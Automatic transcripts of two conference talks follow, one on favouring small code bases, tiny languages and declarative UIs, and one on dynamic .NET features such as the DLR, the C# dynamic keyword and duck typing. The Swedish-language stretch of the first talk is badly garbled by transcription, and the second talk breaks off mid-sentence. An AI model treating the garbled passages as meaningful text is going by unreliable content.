when you add people, everything goes lower. Ja, absolut. Le, the common was that it depends on the situation, basically. How big was the team? Probably who those people were and that were added as well, of course. But it's kind of like a rule of thumb. But I think Brooks wrote it like 35 years ago that I wrote a formula for how much. Slä, hur munch, Mordelade, er, project, VB, if you add one guy. And we seem to forget that over and over again. And actually by having a bigger team, you will get a larger code base. It's a rule of law. Rule of law, rule of nature, sorry. Because people want to do a good job. Of course they add stuff and yeah, it just grows. So we turn into this horrible bad spiral going downwards. Because large code base drives cost bugs and so on and so forth. So this is just horrible. We don't want to be here. Size is extremely important. Final model here. This is from a book by Barry Beam, like 1980. He wrote how cost would change over time for taking out a bug. And he kind of said that, well, a bug found early on is cheap. And the cost for taking it away grows exponentially over time. Sounds quite natural. And I think the whole world regarding software believes in this model still. And it has not just, it's not just about that. It more means now to most people, well, what we don't decide today will hurt us later. That's the meaning of it. So let's decide today everything. Let's take wise decisions. Kent Beck wrote in his first XP book that maybe we don't have to have that model. Maybe if we think a little bit differently, we can have this curve instead. Not saying that the cost will grow exponentially. But yeah, it will level out. So we need to work differently. But we also get to, we are able to work differently because of this situation. We don't have to decide when we don't know anything about it. Early on, early in a project, we don't know a lot about anything basically. But we learn for every day. So we should try to move the decision to a point where we know enough for taking it. It just changes everything. But I don't think that many people actually believe in the second curve. Can we really have that? I don't think that's realistic to most. I think it is. But it's not going to happen automatically. It takes lots of work of course. And yeah, focus on details and everything. So a few observations I've done regarding tiny as a little trend, maybe. The first one was a few years ago, we came up with a concept called CCC because we needed a cool abbreviation. And it meant the chunk cloud computing. It doesn't matter. The important thing was that one guy who came up with the idea said that maybe we have been doing the whole business this favor of trying to force people to go ddd and ddd. En i en certain group of people, there are some who would like that style. There are others who wouldn't. They prefer another style of development and they are super efficient in doing their style. Why on earth should we force them to go our style? It makes perfect sense to me, actually. I've been one of those forcing guys failing with that several times. But as long as we encapsulate the different teams with a clear, crisp boundary, so we don't interfere with each other, it's totally up to each group how they develop. In the group where I am, I prefer having people who would like to do it in a ddd way because I find that to be very productive. But who they are doing it over there, I don't care. If we are doing it in smaller chunks, the idea is that if it turns out badly and we later on found out that we actually needed those automatic tests that we didn't create, we can just scrap the whole thing and start all over again. That was at least the idea. It sounds horrible to some people, but I think that's a quite nice idea actually. I was recently at the ddd summit. We had a discussion about what is good design. I don't think we came up with the perfect definition at all. But to many people in the group, it seemed that tiny was a good property of good design. Go to this autumn, I talked about something similar like this about going for smaller things. To my surprise, I was listening to three other talks saying more or less the same thing in totally different ways. But yeah, I thought maybe this is a trend actually. Then it happens here again today. The presentation before me talked about micro frameworks the whole time. Same arguments that I'm doing. I'm kind of argumenting now that just because others are saying the same thing, it must be correct. That's a quite weak argument I guess. But it's an observation. And I like this quote. Perfektion is achieved not when there is nothing more to add, but when there is nothing left to take away. I think that fits quite well with what I'm aiming for. I'm not at all expecting to reach perfection. Ever, but at least I think it's a nice strive to go for. So a few examples regarding tiny. First of all, from my layering history is quite typical layering here. But this is quite moderate, I would say, because I typically had several layers in the UI as well, of course. And the database, of course, we need layers there, public sprocks, private sprocks, views. All of a sudden we are up to 10, 11, 12, 13 layers. So lots of protection between the user interface and the database. That was the ID. And then I was sending traveling record sets all the way through all those layers without checking anything. Totally dangerous thing to do, of course. Exposing the database schema perfectly for the user interface. Ironically, I didn't trust tools and things for doing the data access. I did that by hand, I spent lots of time with that. When I came to the entities layer, I never had any time left. So I just wrote a placeholder comment there saying, someday I will add stuff here. So that was how I built most of my applications. It's actually much worse than this. It's also the case that there are different model representations in several of those different layers. Of course, in the relational database, there is one model that I have to do some mapping to get into another model. Quite often, I actually didn't use it, but some people recommended having a storage model in objects that was different from the domain model objects. And then you have your DTOs, of course, going over the network. And in the client, you have your view model. All those different models means what? Sorry? Plumbing latency, yeah, definitely. We have to add loads of mapping between all those. Loads of uninteresting code that has to be written. Actually, I don't think that's a good idea. Now that I go for this layering, as a starting point at least, I've put my focus on my domain model and that's it. Maybe some say, well, maybe we would like to store it. Well, yeah, why not, I say, and I can serialize my domain model to storage as one way of doing it. Or maybe they want to have it stored in another way and I just go for that. Somman elsk vill ha en liten look at the domain model from a user interface. Hoppfullt, we can render the domain model in a declarative ways. We don't have to write code for it or we do. We just add what we need. We don't put a lot of focus on starting out large with all those layers that might be good to have, of course not. Instead, we add as we go and as little as possible. What also happens is that instead of having, when we don't have all those layers, we have a tendency of going with several of those instead. Several boundary contexts that live in isolation. I don't care of how they are layered, each of them. That doesn't matter to me. Another example, tiny languages example, actually two of them. Extremely naive examples here, but hopefully they can provide some inspiration for something. The idea here is that we can provide a language for domain experts that they can read. So they don't have to go with documentation or anything like that. They actually read the program instead. The difference is that the documentation is the program. It executes. The normal wisdom here is that we can't expect domain experts to write as well. But actually I find that to be untrue each and every time I try this technique out. They are not dumb. They can learn to do that easily. Actually, it goes automatically. At least if we provide them with an example that they can extend. It's so easy for them. So two small examples. First, this is a little workflow example. I wrote this. I had this written by a colleague of mine for a demo several years ago with a new client of ours. They were a bit reluctant on going with... They only had a crud interface for something. I said maybe that's a typical workflow. Why don't you go for that? They were really reluctant because it was so complex. I can show you how it can be done in three hours for a simple starting point. We did so. We showed this. They have a little language over here. Every blank means one level down. If we change it here, we can try it out and see how the graph changes. Quite simple. We can execute the workflow. Again, it's extremely simple of course. I can say this node is... I'm done here. Then the next node is lightened up as not started. I show that to the architect and the domain expert. What happened was totally a surprise to me. The architect didn't like this at all. He was just asking me what it was all the time. What is it? How does it execute? I was probably a bit irritating because I just asked him all the time, what he wanted to be. That didn't help our discussion. Meanwhile, we talked about this for an hour or two. The business guy who was used to sit in Vizio and draw those graphs. He started playing with it and found out, well, this is extremely much faster to draw than with my Vizio. He didn't need a two hour training course for learning how to do this. It was just an idea for how it could be done. Actually, we've been working with them ever since, but they totally disliked this. It was just a demo. The second example though is in production. Also a tiny little language that is exposed to the business experts. This was on top of a quite competent batch system that they have been using for a while. Every year they have two different times, they have some large executions, and they have, during the year, loads of smaller. This is for a large one that takes a word document of 35 pages of instructions, what should be done every day. We tried to codify that. The language I have to confess is quite ugly. Once again, it was very easy for them to write this on their own. They didn't find it hard at all. Actually, it was not a discussion even. They just started doing it. It was so much simpler than the word document, and then they just click create, and they can run this and try it out, because it turns into a form, where we are going to have a look at that in a minute. Quite often we can move a task to the people who knows most about it, and who wants to make changes to it, by just giving them a language and creating a runtime model for that, a runtime environment for that language. It's quite easy. It has been done for so many years, but I don't think it's been done enough. I think there is much more value to gain from that. The second family of examples with me is using a declarative UI. I found that the UI matters a lot. Of course, we all know that. It's also extremely efficient for our discussions with the business users to be able to show them a user interface immediately, direkt efter att vi har skettat något, och har just showat dem i UI. De vill ha olika frågor än de vill, om man har just showat dem i andra former, som i model och i scenarier. Vi måste ta det mellan olika representeringar för de user, för det är en diskussion. Det är också så att det är så att de borde ha det bästa kod i systemet att vara hittat i userinterferen. Jag ser det över och över igen. Det är ganska svårt. Det är också i fint i en del av en annan kod som vi behöver ha en refresh på den här liten delen. Om vi håller på att skapa den här, så blir det inte så svårt. Vi kan kanske bara generera en userinterferen från några kläder. Det är en userinterferen som var genererad från den kläder som vi bara såg i den liten liten liten. Nu kan de, utan att ha den här ordna dokumenten, ha det här och ha det här och ha det här. Och så kan de få en del av den här processen och se hur de har gjort vad som har varit i jobbet. Och starta olika tapps med systemet. Det är inte alla en liten userinterfer. Det är inte min poäng. Det är bara att vi inte behöver skapa det manuellt. Vi kan ganska oftast generera en del av det, åtminstone. Och det blir mycket mer. Vi har ett framgång för att generera en rik JavaScript-forskning på topfåra rest-servicen. Och vi behöver också en metadata från servicen. Det är en riktigt intressant idé. Det har en stor potential för den framtiden. Vi kan inte bara ta ut alla de komplexa för att skapa en stor problem och ta ut alla små problem. Men vi findar oftast en komplexitet som skapar mellan dem. Det går nån annan. Min poäng här, med att tala om tajen, är inte bara att ta ut en stor problem utan att ta ut hela problemet. Det börjar oftast, jag tror att du har sett det här, men jag kan inte ha det så att jag kan skapa min oR-mapper, som jag har försökt. Det ser så bra ut och små, men det har en tendens av att gröna och gröna. Vi måste vara bäst av att gå i den här stället. Och till många folk blir det så spetanskliga. Det är en liten kod, det är svårt att förstå. Jag tror att det är mest inte. Även om det kanske är lite svårt här och där, så liten kan du gröna det för att ha den här. Den fina exempel är om storhet. Det är något jag har spännit mycket tid på hela mitt karriär. Den här liten främst är om att skapa en aggregate store. Och skapa en del av den domainmodeller från den gröna stället och ner i en gå utan att spela den i en relationell mål. För att inte alla problem är relationell, faktiskt inte så många, jag skulle säga. Många gånger, om du jobbar i en ddd-mål, den relationell mål kommer att hörta dig, jag skulle säga. Det är så att, på samma tid, människa ställen går för oron och en skolserver. Det är bara en fördel. Man måste använda den. Det är nog inte så. Den här liten är bara att skapa den aggregate stället och ståla den i en relationell mål. Man har ingen problem med operationell liten. För att gå till en produkt, det har varit en bra liten för många situationer. Det du har fått från det är att låtet av kodet går bara ut. Man har ju true aggregationen i en database, inte bara i en ditt märk. Man kan ha en global database där alla kan jobba från sidan. De måste gå med ditt kod, så att säga. För en certain problem, performen är bara bra, tyvärr, förut, för att använda en relationell mål. Vi har ingen tid att investera i det. Vi ska bara enda den här talet. En par principplar som jag försökte distilla från de här exempelarna. Först och för mig, kontext är en liten kod, det är mer viktigt än bästa praktik. Bästa praktik är en av de här som gör en liten bellring i min hölj. Jag är lite förutfällig av bästa praktik. Lånningskolven och runtmärk är en fantastisk effektiv mål av att få ut en mål med stort kod med en liten liten kod som kan vara så stort för mer än det har varit användet i tidigare. Det är mycket om att inte öppna dig och inte behöva det. Kanske ta de här koncepterna lite längre. De liten litena frameworker som du har skrivit har att vara uppnågade. Det är en bra sak. Du har skrivit dem för en certain mål. Varför inte använda det? Det är en avdelning för dig. Jag känner inte mycket om att reusinga binor. Jag har bara pastat kod direkt i mitt projekt. Det ska bli med det här projekt och det blir ändrat med det här projekt. Och sen om du har att göra en standardisering och har att sätta sig på det så går standardiseringen på liten protokoll som rest är en bra idé. Det är en avdelning för att fokusera på att HTTP ser ut att vara en protokoll som fungerar på webb. Vi kan använda det på entreprens. Vi har inte att gå med en större standard för denna company för att det inte fungerar i alla fall. Så samarbeten med att försöka gå med den små hela tiden är en avdelning av att göra förändringar i framtiden. Jag tror att det är bara en avdelning. Om du får den här kommenten har du löpt problem med den tajna liten som är entenprensiv. Det är en bra sak. Då har du gjort något rätt. Det var det enden av min tal. Tack för att du lyssnade. Tack.
|
A few decades ago, many developers in the industry often listened to a single big vendor and followed all their advice and lived in their world. Then came the era of using large open source frameworks and moving into that mindset and community. TDD, DDD, XP and so on were important and strong influencers. We still stand on the shoulders of those influences when moving to the next era, the era of tiny. But a lot is also changing. In this presentation we will talk about the motivations for the new era and give lots of examples of how it manifests and what it will mean to you!
|
10.5446/50978 (DOI)
|
All right. So I hope everyone's here to learn about dynamic.net. Hope you had a good lunch. Hope you're having a good conference. All that stuff. So, hi, I'm Keith. We're going to talk about dynamic.net. So just a little about me. I'm from Iowa. That's in the middle of nowhere. I sell motorcycle parts at JPcycles.com. I work on an open source project called PoshGit. I'm talking about Git in two hours, if you're at all interested in that. It should be a fun time. I blog with those techies. I'm a C-Sharp MVP. Yeah. So that's me. So this talk is not going to be about the static versus dynamic debate. We're not going to debate the finer merits of Python and Ruby against C-Sharp and Java and all that fun stuff. We're not going to talk specifically about the iron languages. We're not going to talk about all the fun tricks you can do with iron Python, all the fun tricks you can do with iron Ruby. And we're not going to talk about how to build your own iron language, those that you get that dives into internal so we just don't have time for today. What we are going to talk about is what the DLR is, how dynamic works in C-Sharp, and then some interesting use cases. All the code in get hub if you want to follow along, dolby case slash presentations. Let's go. So dynamic.net has been around for a while now. When they first announced it, there was all sorts of controversy. This linked to a particular post that amused me. Hallmarks of a great statically typed language, certainly. Less and less robust because of all these shortcuts. The disaster started with var. So clearly somebody doesn't understand var. I like the last one the best. Not to save you from yourself, but to save you from incompetent coworkers. This is a very encouraging thought. So I obviously wouldn't be coming and talking to you today if I didn't believe there was some merit. So to believe that C-Sharp is 100% strongly typed and statically checked and everything is just silly. All over the place we got these magic strings that reference something dynamic, something that we don't know at compile time. So when we're pulling something out of a data record, we have to know what type it is, what the column name is. Pulling something out of XML, we have to know the type of the thing that it is. If it's the wrong type, if we try and cast A to an integer, assuming we're not doing hex, then we're getting error at runtime. Similarly when we're sticking stuff in view data and using these magic strings to pull stuff back out. All of these are dynamic behaviors that we've got inside our nice little happy statically typed world. So wouldn't it be nicer to be able to do this kind of stuff instead? Have it actually read like code? To not have to do explicit casting from here to there? That's the sort of stuff that dynamic is going to allow us to do. It's not always the right tool for the job, but when you already have dynamic behavior in your app, if we can turn it into something that reads more like code, but captures that same behavior, I think there's value in that. So when we're looking at dynamic.net, there are kind of three tiers. The top tier, we've got the languages. Those are the languages that support the dynamic language runtime. Now those talk through the DLR sitting in the middle, which provides essentially the foundations for this dynamic behavior. And then at the bottom level, we've got the different objects that we're talking to. I mean, ultimately a language, you know,.net languages are about making objects talk to each other. And so those objects might have standard CLR behavior. They might be com objects. They might be JavaScript objects in Silverlight. They might be dynamic language objects from Python or Ruby. And of course, you can build your own as well. So the DLR kind of sits in the middle. But first let's talk about languages. So IronPython and IronRuby have been around for a while. They started in Microsoft, I believe, and they have since been pushed out of Microsoft, and they're now open source and left to the community. Ultimately, if we want dynamic languages on.net, and you can see from the JVM community, there's certainly value in having a strong Ruby and a strong Jython, that kind of thing. If we want those as a community, we're going to have to push those forward. So they're the Iron languages, and those are all built on the DLR, which shipped with.net 4. Previously, they were running on their own dynamic language implementation. VB has actually had dynamic behavior since.net started. All you have to do is just turn options strict off, and then now you've got access to late binding. But since 10.0, which is what shipped with Visual Studio 2010, it uses the DLR behind the scenes. And then finally, C-Sharp in version 4 added the dynamic keyword to expose the same behavior that you can access through VB. So let's talk a little bit about C-Sharp dynamic. Is anyone here not read C-Sharp? Good. Is anyone that is a VB developer that prefers C-Sharp? Is there anyone that's a VB developer that does not prefer C-Sharp? All right, I have yet to meet one. Okay, so C-Sharp dynamic. So with dynamic, there's always an implicit cast from some CLR type, like a string, to dynamic. You can always just take something static and treat it dynamically. So if you had a method that takes in dynamic, you can always pass in a.net normal static object. You can also implicitly go from dynamic back to a CLR type. Now, of course, that depends on the dynamic being able to be cast and converted to that type. We can always say, all right, we've got our dynamic foo. Now let's assign that to a string, bats. And of course, this will work because we know that foo is a string. And finally, any expression involving dynamic is itself dynamic. So if we were to just let the compiler figure out what type is Quux, well, we've got foo and we've got bats. Well, foo is dynamic. Therefore, the expression is bound dynamically. And then Quux is going to be treated dynamically as well. If we said string Quux instead, then if it would do some dynamic casting to say, all right, well, this dynamic expression now has been evaluated. Now let's try and make that a string. In this case, it would succeed. And so that's what you would see with the intelligence. All right, so there are essentially two ways that dynamic is consumed. On one hand, you've got your existing static methods and behaviors, just for example, absolute value. It's ridiculous. Well, it might seem ridiculous that you have to have eight different versions of absolute value just to say, if it's less than zero, make it positive. But indeed, we have a version for decimal, a version for double, a version for float. So we can also consume that dynamically. So if I've got a dynamic X, in this case, initialized to two, so we know it's an integer, if we call math.absolute value, at runtime, it's going to figure out that my error is in the wrong place. It's going to figure out that we want the int version of absolute value. Similarly, if we have 1.75, that's a double, so we point in between double and float. Huh. Well, you get the point. So at runtime now, we're going to pick the correct version. This is called dynamic dispatch. At runtime, figuring out the behavior based on the methods available to the runtime at the time. Now, what if we were to pass in two instead? Now, this dynamic dispatch is going to say, huh, we don't have an absolute value version for string, so we're just going to blow up. So the best overload method, match for absolute value, and it just picks one of the types since it's overloaded, has some invalid arguments. So we don't know what to do, so it's just going to blow up. Rule number one of all this dynamic stuff, you need testing because the compiler is not going to protect you in these situations. So this is, I mean, the Python Ruby communities have really embraced testing. JavaScript people are figuring out that they should have done that a long time ago. And so, you know,.NET isn't as good about that sort of stuff in dynamic. You have to be or your stuff's going to break. It can also go the other direction. So we can define methods that consume dynamic, make our own dynamic math class that has a single absolute value method, takes in a dynamic and returns a dynamic. This will succeed as long as we can compare to zero and we can do a negation. So we pass in a two, it says, all right, two has a greater than or equal to zero, two has a negative if we need it, in this case we don't. Similarly, we pass in a double, it says, all right, a double can also be compared to an integer, the framework is smart enough to allow that. But again, if we pass in a string, we're going to get an error greater than or equal to can't be applied between a string and a zero, or a string and an integer rather, which is what we would expect. So that's really kind of the two directions that you can work with the dynamic stuff. So now there are some caveats and limitations. One, you don't get much conversion and coercion. So in those cases, some languages would say, all right, well, you're trying to compare a string to an integer. So let's either turn the integer into a string or vice versa. You do that same comparison in JavaScript and JavaScript will say, well, hey, that too looks like an integer. So I'll just turn it into an integer and compare two to zero. Oh, hey, we'll give you two back as the result. It's not the case in C sharp. We're.NET in general. So anytime that we have that taking the foo and bar and adding those together and assigning it, trying to cast that as a string, that has to be explicitly supported. We know that it's a string and a string. And so that to a string, we know that that makes sense. But if those objects weren't, if there wasn't a conversion to string defined, then we've got a problem. Also with dynamic, you don't get extension methods. And if you were to try to extend dynamic, well, it won't even let you, or you could try to extend object, or it doesn't work. Basically because extension methods are a compile time trick, but trying to resolve those at runtime, because every dynamic expression is itself dynamic. So now we've got runtime evaluation of this kind of compile time trick that extension methods are. So those don't work. So working with link is tricky. Basically you have to take whatever your dynamic stuff is, push it into an I enumerable of something, maybe an I enumerable of dynamic. And then you can say, all right, from D in my dynamic something, which is an I enumerable of dynamic. And then now within that, you can say where do some dynamic thing, et cetera. Any questions so far? Okay. So when you write just a simple dynamic method, what goes on under the hood? So we're passing into dynamic X, we're returning a dynamic incremented value. So what does this actually turn into? Well, it turns into a whole lot of code. And be glad that you don't have to write this yourself. So what do we have here? Well, first at the top, we've got a couple of call sites. So call site caching is one of the performance enhancements that makes the DLR not a bad idea. Basically once the runtime is figured out the first time through how to handle this sort of stuff, then going forward it says, all right, I'm probably going to be able to do the same kind of thing. You know, they're not going to keep passing in different kinds of stuff. It's probably going to be the same kind of object. So we've got call sites. So in increment, we're going to initialize it if it isn't already. And in the initialization, you'll notice create, we pass in an operation. So for the first, we're doing a conversion operation because we want to take the result of this dynamic expression and return it as an integer. So we've got to convert that result. And then the second is going to be a binary operation that uses expression type of add because we said x plus 1. Finally, we say, all right, so for our final result, we want to take the first call site. That's our conversion. And we pass into that the value from site 2 applied between x and 1. So that's the actual addition. Site 2 target site 2 with x and 1. That's the x plus 1. And then the outer operation there is what then says take that result, that run time, and try and make that an integer again. So you'll notice that there was expression type dot add. So all of the DLR now under the hood uses expression trees. Expression trees have been around since.net 3.5. But they were missing some things, first of all. Well, actually, they were missing a lot of things. A few things actually necessary to represent all the valid expressions that you can represent in C-sharp. So things like plus, plus, and minus, minus. Even though they have side effects, there's also a result returned from that. And so they've added support to those, to expression methods, or to lambda expressions. In addition, they've added a whole bunch of new stuff. We've got assignment operators. Those didn't used to be represented through expression trees. Now they are. Control flow, ifs, which even go to. Not necessarily considered harmful, but usually. Dynamic dispatch. So if we want to say, all right, here's an operation that we have to resolve at run time, that also has to be represented in the expression trees. Add all that together. And everything that you can express with C-sharp and VB is now representable through these full method bodies. Or through these expression trees, rather. So when you're working in iron python, it's just going to generate an expression tree. When you're working in iron ruby, it's just going to generate an expression tree. So like in C-sharp, this is the expression tree that's essentially generated behind the scenes. So we pass in a dynamic n. And then we've got our dynamic if. And so then the conditions defined using a dynamic equality comparison between the parameter and the constant, and then we've got the if true and the if false. So if it's true, then we have a constant one. Otherwise, we do a multiply, we do a minus, and call ourselves again. So that's in C-sharp, very similar to what you see in python. In python, we've got a dynamic invoke to figure out, to call myself again. It's kind of interesting the way that python views methods. It's going to go and look up the fact field in the global namespace. And then we call the minus. Ruby is even more different. There's a specific kind of ruby method call that's treated differently than normal method calls. And then parameter self. And yeah, these details don't really need to concern you. All you need to know is that iron python and iron ruby work, but it's all using the same machinery under the same representation of that code. So that's the DLR. We've got the expression trees, we've got the call site caching, which is all generated by the compiler for you. We've got dynamic dispatch, which says at runtime, you asked me to do an add method, and you asked me to do an add operation, figure out what I can do. Between all of those. Now the missing piece is to say, all right, let's build some dynamic CLR behavior. Let's build those, the dynamic XML, the dynamic data record, that kind of thing so that we can take advantage of this functionality. So there are a few things that the.NET framework provides for you. The simplest is an expando object. Essentially, it's just a dictionary that you can use dynamically. So you can assign key value pairs and access those as normal properties. Interestingly, you can also assign a delegate to a property and use it as a method call. So if I assign a funk of int and string that returns a double or something, I can assign that to a property on my expando object and then call it giving it a string, giving it an int and returning a double, which is pretty neat. Going a step deeper, there's the dynamic object base class that's provided for you. It provides a number of overloads or of virtual methods that you can override. It says, try and do a conversion operation. Try and do a binary operation. Try and do a method invocation, access by property, access by indexing with the square bracket thingies. All that stuff is exposed by your dynamic object base class. So if you want to implement dynamic behavior, that's probably where I'd start. And if you're really hardcore, you can implement iDynamicMet object provider. That's what they do for you in dynamic object and an expando object. So all dynamic objects really just implement a one method interface that says, given the expression you want evaluated, return me the result. Go. So if you wanted to implement an iron python and iron ruby, you essentially just have to make a whole bunch of objects that implement this meta object provider and then returning a dynamic meta object that has the behavior that you want it to have. So we're not going to look at the last one, but we are going to look at a library that does leverage it. But we are going to look at a dynamic object as well. So for the rest of the talk, we're just going to dive into some code. This is a Bentley link that I've put together that packaged us up a whole bunch of interesting dynamic projects, including the languages project called impromptu interface by a guy from St. Louis, a couple other interesting things. So if you want to go check out that link, you can click around instead of paying attention to me. Any questions before we flip over to Visual Studio? No. Okay, let us do that then. So what do we have here? So to start out with, we can just kind of show that the simple dynamic behavior that we would expect, here I've just made an array for us that has a couple things that have a length property. So we've got strings, which have a length. We've got an array, which also has a length. This is a completely different kind of length, but it has it. And then we just make up a dynamic object, or an anonymous object rather. This isn't even a type that exists in our code, but it has a length, so we would expect that to work. And then finally, we also add three just to see what happens for something that doesn't have a length. So if we run this, we see that we indeed got the length of long. We got a length of two, we got a length of five. And then we get our int does not contain a definition for length. So that's the sort of runtime failure that you're going to have with this dynamic. So if we just said, hey buddy, give me a list of things with lengths, and they give us a three, well we're going to get a runtime error. That's a problem. And the answer is not to just catch runtime binder exception and swallow it. Not good. We can, but don't, please. So that's the simple behavior. So what about operations? All operations are also going to be dynamically dispatched. So we've got a collection of just some arbitrary x values, collection of some arbitrary y values. We're just going to try and add them together. So we've got a couple ints, we've got a decimal, we've got a float, we've got now, and a time span. We'll just see what happens. So either we're going to catch the exception and spit it out, or we're going to return the result. So if we run that, that would not be the right one. We are going to run that. So let's just check out what we got here. So starting with the ones. So we can add a one to a two, to a three, one, four. We can't add one to a time span. That seems reasonable. One what? One second, one day, one minute. But we can add it to a string. So for the string, we figured out that we wanted that using string concatenation. Trying to add a string to everything works just fine. Adding a double to things generally works fine. Adding a double and decimal together didn't work, which kind of surprised me. They're pretty similar, but they're not necessarily the same thing. I mean, which do you pick? If you add a double and a decimal, do you pick the double? Because you already have that kind of lack of precision. Or do you pick the decimal? Because, yeah, I don't know. So they just blow up. And then down here, we see that you can actually add a date time. And here we have 12 hours from now. And of course, string concatenation works as well. So operation resolution generally works pretty well, except it fails in the places that you would expect it to fail. So again, if you're just getting something out of Python or out of Ruby or out of databases, if you don't know the type of things, generally these operations might work. But if they don't, you're not going to find out until runtime. All right. So now let's actually work on building some dynamic objects in.NET. So I mentioned expando object. That's kind of your basic key value pair, essentially similar to a JavaScript object. You can assign properties and get the result back out. So here we're going to say, all right, give me an expando object. Let's set its name to Keith. And of course, that will work. And then we can also say, all right, give me a function that takes in an integer and returns an integer. Just add one to it. So here then we can call. If I hover over EX here, it's going to say it's a local dynamic variable. So at compile time, we don't know what the result of that's going to be. It's just object, essentially. But if we run that, as expected, we see Keith. We can also make changes after the fact. So now my name is Bob. And if we run that, so this is very, very simple. There's no sort of write once, read only after that. Very, very simple behavior. So that's an expando object. Useful for some things. I believe they use expando object for the view bag in NBC3, which is essentially view data, but it does this kind of stuff for you instead of having to do strong casting and stuff. So I mentioned impromptu interface. So what if you want to build a more sophisticated dynamic object? What if you want to build a dynamic object that has array-like behavior or something like that? So impromptu interface includes a builder for you. And so it's kind of similar to clay, which is a project that came out of the Orchard CMS. And so the pattern that they both use is you basically give yourself a dynamic factory and the convention is to call it new. So we say, all right, give ourselves a new builder and make it dynamic. So now this new implements some dynamic behavior that says, all right, when I say a new dot person, here I can pass in a couple arguments using kind of the named parameter syntax. So his name is Robert Paulson. We can also use methods to assign things. So on that new person, we're also going to say the age is 42. You can pass in those delegates very similar to the expando object. So here we're going to say, all right, give me a function that returns void that just calls for Trogdor. And then finally, we're going to add a greeting method that returns a string. Interesting difference here. Instead of just saying arguments, we say this and arguments. So this in arguments is going to give us the dynamic instance first, but then also let us pass in the greeting parameter. And then the result is a string, as we'd said before. So if we run this, we'll see that his name is Robert Paulson. So we access the first name, last name, age, access, or called the greeting method. We asked him to sing. So far, so good. So a common question is, how do we kind of add some structure? What's the best way to bridge the divide between this dynamic stuff, which gives you access to, you know, customly constructed objects or stuff that you pulled out of databases or stuff that you pulled over from Python or Ruby? How do we bridge that gap and say, all right, now at some point, we have to switch back to static stuff. So we've got well-defined interfaces. How do we bridge that divide? So impromptu interface also gives you the ability to do duck typing, which says, you give me a dynamic something, and I will treat it as the given interface. So let's uncomment this. So just down below here, I've defined a couple interfaces. I've got a person that has a read-only first name and a mutable last name. I've also got a greet interface that provides that greet from a string to a string. So now if we want to say, all right, well, we built this person up above. His name is Robert Paulson, and he knows how to greet. So first we can say, all right, well, now let's take this person and change his last name. So now we've got Robert Martin as a duck-typed person. And then we can come and take that same person and say, all right, now treat me as a greet as an I greet. So we've got a duck-type greeter, and we're going to say that he's a clean coder. So now if we run this, you'll notice that Robert Martin is our clean coder. So this duck typing, it's not wrapping it in a proxy or anything like that. This is the same instance. We're changing this Robert Paulson instance to now be Robert Martin. And then treating it as a completely separate interface and saying, now give me a greeting. And it says that I'm Uncle Bob the clean coder. I think that's pretty cool. So imagine you had, say, an XML file. We build up a little library to pull stuff out of that XML file dynamically. So I work in e-commerce. Let's just do it. So we've got our discounts. So this is just an XML file that we're going to want to parse out and use. So we've got, I just kind of made up a scenario. So each discount has an ID. Each discount has a code that our customers are going to put in. And then I thought, it'd be pretty neat if instead of having to build this dynamic logic into, or build the discount logic into our app, I'd rather give the marketing people flexibility to say, you define the discount, you define eligibility. If this person orders an odd number of things, we should be able to give them a discount. We don't want to have to build that into our app. I just want to say, all right, you give me a bit of Python and I'll turn that into a validation. So we say, all right, well, for this, we're going to have Python. Here's a little Python script that just says return true all the time. We're going to let it expire. Here's a different Python for false. Here's a Ruby one that says, if it's a bigger order with more than five items, then we want to consider this discount to be valid. So how would we take this and consume it dynamically? So there are a couple, so I've implemented a couple of different interesting things. So let's start with kind of our standard XML, all right. So we've got an XML discount repository. So there's a base class which doesn't really have anything particularly interesting in it. But we want to be able to say, all right, give me a list of discounts given an XML document. All right, so this is how you do this today. So you would say, all right, so from the discount elements in my document, make me a new discount. Discount actually takes in dynamic here just to be interesting. But that doesn't really matter. So we're saying, build me up a discount, and for that discount, I need an ID, I need a code, I need an expiration. So we're manually mapping from these XML elements to a.NET version of the same type. We also have to be explicit here that ID is an int, that code is a string, that expiration is an optional date time. This is all very tedious, prone to error. You'd have integration tests that parse through the file, make sure that everything is valid. This is not a great way to be. So let's look at the dynamic version instead. So all of that, that as dynamic. I prefer that. I think that's less code. So let's take a look at as dynamic. So dynamic now, we're just saying, all right, given an x element, make me a new dx element, and we'll run from there. dx element implements or inherits from dynamic object. That's the middle one that I mentioned that provides base classes for you. So for this dx element, we're now going to say, all right, when somebody accesses a property on me, I want you to try and find an element with that name. So this is what that looked like. So try get member is kind of the structure of all the dynamics. If we come up here, we can say override. You see there are a bunch of them. Try binary operation. Try create instance. Try delete member, which you can't do in.NET, but you can in Python, I think. I don't think I'm not sure if you can. I don't know. One of the dynamic languages supports deleting members, even though we can't. So there are a whole bunch of operations that you can implement. So we implement two. One, try getting a member. So if the element that was passed into us exists, then try and find an element with the name that was provided. And then let's treat that element dynamically, because that element might have other elements in it, or it might just be a value. In this case, it's, these are values, so we also need to now support conversion. So this is not a trivial implementation, but essentially we just say here, if somebody asks us to convert this x element into some other type, maybe an integer or a string, this is how we're going to do it. X element has built into it a whole bunch of casting behaviors, so you can do an explicit cast to string or to decimal or any of that stuff, and the x element class will behave as expected. So we just say, all right, given an x element, return me, given a string, cast me as a string, date time to date time, and to int, et cetera. So this is just very, very simple dynamic XML mapping using the dynamic object base. But that's all we need. So we, so looking back at the XML repository, we're just saying for each discount element in our thing, you'll notice we have to kind of work around the whole XML or the link limitation with dynamic, but we say, all right, give me all the discount elements. Now for each discount element, make a new discount out of me consumed dynamically. Yeah? So consuming dynamically, let's go ahead and take a look at discount then. So in discount, we're just saying, I'm a dynamic. Give me something, and I'm going to assume that something has an ID, it has a code, it has an expiration date, and then it has a script type and a validation script. The explicit casts here are to get around some weird binding issues. Yeah, and then get validator from script just as if it's Python, use Python if it's Ruby, use Ruby. Otherwise, I do not speak Klingon. Not going to dive into this, but just so you can see it, that's all it takes to say, pull a function out of Python. Pull a function out of Ruby. And it just automatically turns it into a.NET delegate that we can call. Yeah, so we're saying, give me a script, and then we're pulling out, we just assume that they're going to define an is valid method. So you give me a block of script that has an is valid method, and that could even call other methods earlier up in the script. You can give me a thousand lines of code here if you wanted to. But I'm just going to export is valid, and then return that, no casting or anything, return that as a function given an order. Note that your dynamic stuff isn't going to be aware of what an order is. We just know that an order has a number of items, it has total price, that kind of thing. So we're going to give you an order, and you're going to give us a Boolean. So just treat this is valid as if it were this.NET dynamic delegate, and then we return those. And so that we assign then to the is valid function here, which we can use externally as if it were just a method. There's expiration date. Any questions about this so far? Okay. So we've got our dynamic X element. Let's see this in action. We're just going to skip over curing for now. So in the simple case, we just want to say, all right, so here's some Python, some script. So we go ahead and define at our is valid function, and then we say, all right, if there are two items, then we'll call this 